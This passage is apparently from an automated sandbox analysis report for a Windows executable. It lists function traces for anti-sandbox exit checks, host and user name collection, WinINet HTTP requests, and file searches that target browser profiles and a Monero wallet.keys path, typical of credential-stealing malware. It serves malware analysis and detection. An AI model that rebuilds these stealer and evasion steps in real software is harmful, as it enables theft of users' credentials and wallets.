                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                      • Instruction ID: 6832f25de47d9b0ab20a7ceae4a5ab06024d8dad58e542e5f6e24febdfe2fbd0
                      • Opcode Fuzzy Hash: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                      • Instruction Fuzzy Hash: 4FF0307094024AAAF700ABA0DC2AB7D7E74FB04712F608917BD03A2191DBB46548D656
                      Function 005447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: c582de9b009d3167ab7939fbbd8bbcac915e63cee8c6b95bb586f2ec73d1770d
                      • Instruction ID: 6b4b391496653c88bed395f59087187a6c9f4c7a761e2d822e1322edbde6a550
                      • Opcode Fuzzy Hash: c582de9b009d3167ab7939fbbd8bbcac915e63cee8c6b95bb586f2ec73d1770d
                      • Instruction Fuzzy Hash: 8D211DB1D00209ABDF14DFA4E849ADE7B75FB45321F108626F925A72D0EB706A09CF91
                      Function 005551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                        • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546303
                        • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                        • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
                        • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                        • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                      • Instruction ID: e6d16ada3ff708b3ce11cb7c9bdf117ce77cad8381cca31ccfdf90c49b6b87bf
                      • Opcode Fuzzy Hash: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                      • Instruction Fuzzy Hash: 03111F30910449A7CB14FF70DD6AAED7B38BF90301F408655FC1A46592EF306B09CB91
                      Function 00541220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1493 541220-541247 call 5589b0 GlobalMemoryStatusEx 1496 541273-54127a 1493->1496 1497 541249-541271 call 55da00 * 2 1493->1497 1498 541281-541285 1496->1498 1497->1498 1501 541287 1498->1501 1502 54129a-54129d 1498->1502 1504 541292-541294 ExitProcess 1501->1504 1505 541289-541290 1501->1505 1505->1502 1505->1504
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                      • ExitProcess.KERNEL32 ref: 00541294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 803317263-2766056989
                      • Opcode ID: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                      • Instruction ID: 0dbb06116785e83c430c4a204ab77aa88386feadc157b5320cfcc0780325ca52
                      • Opcode Fuzzy Hash: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                      • Instruction Fuzzy Hash: 20014FB0948308BAEB10DBD0CC49B9EBB78BB44705F208055E705F6180D7B46585875D
                      Function 005578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                      • Instruction ID: af00ef862b9f4821313cfb74156a62dc8a62f7e4c2d6f27e3e4e0d1f47adc1bf
                      • Opcode Fuzzy Hash: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                      • Instruction Fuzzy Hash: 9D0162B1944208EBDB10DF94DD45FAAFBB8F704B21F10421AEA45E3280C37859048BB5
                      Function 00541110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                      • ExitProcess.KERNEL32 ref: 00541143
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                      • Instruction ID: f3aa8f6f6cf297fe64ee3c59b72add0a5333aaa336e3f832f5311aad4c58ff13
                      • Opcode Fuzzy Hash: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                      • Instruction Fuzzy Hash: 30E0E670985308FBF710ABA19C0EB497A78AB04B45F204055F709761D0D6B92640979E
                      Function 005410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005410B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005410F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                      • Instruction ID: ad979e7d54e63171e9091120d29bd7897c341c9a54eab0ca3def99d3140d439e
                      • Opcode Fuzzy Hash: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                      • Instruction Fuzzy Hash: 5AF0E271681208BBE7149AA4AC5DFBABBE8E705B15F304449F904E3280D5719F40DBA8
                      Function 00541190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                        • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                        • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                        • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                        • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                        • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                      • ExitProcess.KERNEL32 ref: 005411C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                      • Instruction ID: b55363fb87426da481e92bb1159e7fbf36ff10ec0fb6d647fcb5b2724e286043
                      • Opcode Fuzzy Hash: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                      • Instruction Fuzzy Hash: 9CE0ECB595420663DA0073B0BC1EB2A3A9C7B5434AF144426BE0592502FE29E854866E

                      Non-executed Functions

                      Function 005538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 005538CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 005538E3
                      • lstrcat.KERNEL32(?,?), ref: 00553935
                      • StrCmpCA.SHLWAPI(?,00560F70), ref: 00553947
                      • StrCmpCA.SHLWAPI(?,00560F74), ref: 0055395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00553C67
                      • FindClose.KERNEL32(000000FF), ref: 00553C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                      • Instruction ID: ee6726cd8cc635dd126b556541277f79f90b32a300dd20c78184e5c2eacc45f4
                      • Opcode Fuzzy Hash: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                      • Instruction Fuzzy Hash: CDA154B1A40209ABDB24DF64DC99FFE7778BF84301F048589B90D96141EB759B88CF62
                      Function 0054BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00560B32,00560B2B,00000000,?,?,?,005613F4,00560B2A), ref: 0054BEF5
                      • StrCmpCA.SHLWAPI(?,005613F8), ref: 0054BF4D
                      • StrCmpCA.SHLWAPI(?,005613FC), ref: 0054BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0054C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                      • Instruction ID: a376b533160e8361919a632a0eec6438eb9fd25761e526e0633f112b21ee6eaa
                      • Opcode Fuzzy Hash: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                      • Instruction Fuzzy Hash: 74425572910105ABDB14FB70DD6AEED7B3CBBC4301F408659B90697191EE34AB4DCB92
                      Function 00554910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 0055492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00554943
                      • StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                      • StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                      • FindClose.KERNEL32(000000FF), ref: 00554B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
